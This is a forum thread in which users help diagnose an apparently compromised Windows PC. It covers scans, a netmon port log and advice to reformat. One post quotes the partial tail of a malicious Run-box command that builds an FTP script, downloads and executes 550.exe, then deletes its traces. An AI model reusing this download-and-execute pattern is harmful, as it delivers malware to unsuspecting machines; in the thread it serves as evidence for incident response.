• Welcome to Overclockers Forums! Join us to reply in threads, receive reduced ads, and to customize your site experience!

Help kill a bug

Overclockers is supported by our readers. When you click a link to make a purchase, we may earn a commission. Learn More.

eaglescouter

Frustrating Senior SETI Nut!
Joined
Dec 9, 2002
Location
CA- Not far from the Allen SETI array
Friend says his box BSOD'd on him, so I agreed to look at it. For me it booted up just fine.

I ran:
ccleaner
spybot s&d
AVG scan
housecall trend micro online scan
hijack this
Windows Defender

Nothing particularly interesting showed up,.... until 11:30 tonight!

While cruising the OCForums, the run window popped up and text was magically typed into the window. I interrupted it and copied part of the line which prevented execution.

This has tried to run two times in the past 10 minutes. I'm looking for bug hunting suggestions so this thing can be killed dead in its tracks.

Here is the text I was able to grab, first part was lost, this is the end of the command:

ho quit >> i &ftp -n -s:i &550.exe&del i&exit
 
your going to have to scan a little better. i use 2 blockers to go with search and destroy and my av spywareguard and spywareblaster have kept my rig spotless.

i would try a few other av scans and if that doesnt work sounds like a perfect time for a fresh install.
 
This looks like someone has taken over the machine.

First thing to do is lock out interent until the worm/trojan is gone. Do all your work in Safe Mode. This will reduce any chance of it respawning.

Run a vigerous regime of virus scanners. Grab a few updated freeware/trialware from the net on another machine. Run them at the highest level you can get them.

First dump the restore and any temp files. If you find some odd entries. Remove them, them restart the machine after you think you got them. Then rescan again with the VS that got it first. Just to make sure it did not respawn.

I found Kapsersky is good at the odd things. It gives a good hit rate. If you find a tid bit on what it is and where it is living. You can have an easier time of removing it for good.

Once it is removed, find a better virus scan/firewall solution. :D
 
Most of the critters I ran across. Lived in the C:\WINDOWS\system32 folder.. or drivers. So if you find any bugs. Good chance they will be lurking in there. There is some uncommon spots also, but most are stuck in that area.

Good luck!!
 
Is your buddy running RealVNC? If so, there is a security issue regarding Password Authentication. To fix this you can update his free version to 4.1.2 or his paid version to 4.2.3 or later. Unfortunately, this does look like someone has compromised the computer. If you really want to get to the bottom of it, you might want to download --Hijackthis-- (be sure to rename the .exe file to something random as some programs can detect hijackthis.exe running) and also try running rootkit revealing programs such as --Rootkit Revealer-- and/or any of the programs at the bottom of --This Page--. But, as others have recommended, once your computer is compromised, the only way to guarantee it to be safe, is to reformat.

If you would like to read more about this issue, you can try one of the following links:
I hope this solves the problem, but if not.. let us know.. we will keep on looking!


Raven
 
realvnc was installed but not running when I spotted the suspicious activity. Since the machine was behind a router, vnc not running, and the box has a new IP behind my router, I doubt that a human was actively working the voodoo, I susect it was a script of some sort.

I have set kaspersky on active duty, passworded the settings in kaspersky, and told it to report everything. We may just have to wait for the voodoo try to run again and get caught and identified.

every AV product is returning a report of a clean system. Hijack has nothing unusual shown either.
 
I would retrain the firewall and see if any hits show up.

If you have a software firewall reset the config. If it is pure hardware based, grab a good software firewall and use it for the popup notifications. Plus I would be looking at the firewall logs to see what external IP is talking to the computer.
 
Even though RealVNC was not running, its service probably was. I would still advise you to disable its service (Since I do not have first hand experience with RealVNC, I would click on Start > Run > Services.msc and look through and disable it there) and upgrade to the latest version. This should prevent any more of those 'run' pop-ups from appearing.
 
VNC was not running because I had uninstalled it, and the service was no longer present. Even HijackThis showed no sign of vnc.

While I admit that I do not know the source of this bug, I can be relatively certain that VNC was not part of what I saw last night.
 
eaglescouter said:
realvnc was installed but not running when I spotted the suspicious activity.
eaglescouter said:
VNC was not running because I had uninstalled it, ...
The reason I was pushing for RealVNC was because in your previous post you had stated that it was installed, and, after google-ing your problem, many of the results came back with symptoms similar to what your friend had experienced. But, since you now seem to imply that the problem persists even though RealVNC was uninstalled and since you are "relatively certain that VNC was not part of what I saw last night", I will continue to look for other explanations for you and post back if I can find anything else.
 
Why not use netmon or something similar to see what ports are open, and where connections are being made? Sounds like this machine is owned, big time.
 
C:\Program Files\Netmon\11-23-06.txt
Timestamp: 2:34:42 PM Nov 23 06
Generated by: Netmon 1.6

Remote address : *:*
Local address : *:loc-svr
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : *:ms-cifs
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 127.0.0.1:1033
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 127.0.0.1:1034
Protocol : TCP
Status : Listening

Remote address : localhost:31416
Local address : 127.0.0.1:1040
Protocol : TCP
Status : Time wait

Remote address : *:*
Local address : 127.0.0.1:1042
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 127.0.0.1:10110
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 127.0.0.1:31416
Protocol : TCP
Status : Listening

Remote address : *:*
Local address : 192.168.0.102:netbios-ssn
Protocol : TCP
Status : Listening

Remote address : 64.62.193.183:http
Local address : 192.168.0.102:1415
Protocol : TCP
Status : Time wait
 
Got your PM. Check out this link (scroll down to the first informative response):

http://www.experts-exchange.com/Miscellaneous/Q_20873048.html

Do a 'netsta -a' from the command prompt, then pipe and filter the output to narrow down the results. Also, do a 'netmon -O' to see which processes are commanding which ports. Additionally, you should take a look at open processes in the task manager.

If that box isn't already off the network, unplug it now. Then start looking through the netmon results and googling the ports which look suspicious.
 
So the bottom line is: Somebody got access to the box, performed unknown tasks, and the only real solution is to tear the house down and reinstall following a format.

Since the crook got in, he is assumed to have his own key.

Format it shall be. Thank you for your assitance, this is an awesome forum.
 
the external IP in there resolves to...Hurricane Electric HURRICANE-4 . I'd say owned and botnetted. You may want to contact them and let them know that they are part of a botnet now:eek:

Nevermind. I did a bit of checking and that particular server is a noted spam scum hideout. your friend might have been getting enlisted in a bit of spamming. Reformat and educate on staying away from these little nasties.
 
Last edited:
Back